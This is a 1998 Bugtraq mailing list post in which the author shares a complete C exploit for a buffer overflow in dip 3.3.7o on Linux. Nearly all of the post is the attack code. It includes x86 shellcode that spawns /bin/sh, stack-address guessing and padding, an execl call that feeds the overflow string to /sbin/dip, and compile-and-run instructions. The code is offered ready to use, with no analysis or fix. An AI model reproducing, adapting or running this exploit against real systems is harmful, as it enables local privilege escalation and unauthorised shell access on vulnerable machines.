Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

dip 3.3.7 exploit

From: jamez () UGROUND ORG (jamez)
Date: Thu, 7 May 1998 20:06:47 +0000

Here an exploit for dip 3.3.7o buffer overflow.

----- cut here -----
/*
  dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998)
  coded by jamez. e-mail: jamez () uground org

  thanks to all ppl from uground.

  usage:
     gcc -o dip-exp dip3.3.7o-exp.c
     ./dip-exp offset (-100 to 100. probably 0. tested on slack 3.4)
*/


char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";


#define SIZE 130
/* cause it's a little buffer, i wont use NOP's */

char buffer[SIZE];


unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}


void main(int argc, char * argv[])
{
  int i = 0,
      offset = 0;
  long addr;


  if(argc > 1) offset = atoi(argv[1]);

  addr = get_esp() - offset - 0xcb;

  for(i = 0; i < strlen(shellcode); i++)
     buffer[i] = shellcode[i];

  for (; i < SIZE; i += 4)
  {
     buffer[i  ] =  addr & 0x000000ff;
     buffer[i+1] = (addr & 0x0000ff00) >> 8;
     buffer[i+2] = (addr & 0x00ff0000) >> 16;
     buffer[i+3] = (addr & 0xff000000) >> 24;
  }

  buffer[SIZE - 1] = 0;

  execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)0);
}
----- cut here -----


--
jamez () uground org
Previous By Date Next
Previous By Thread Next

Current thread: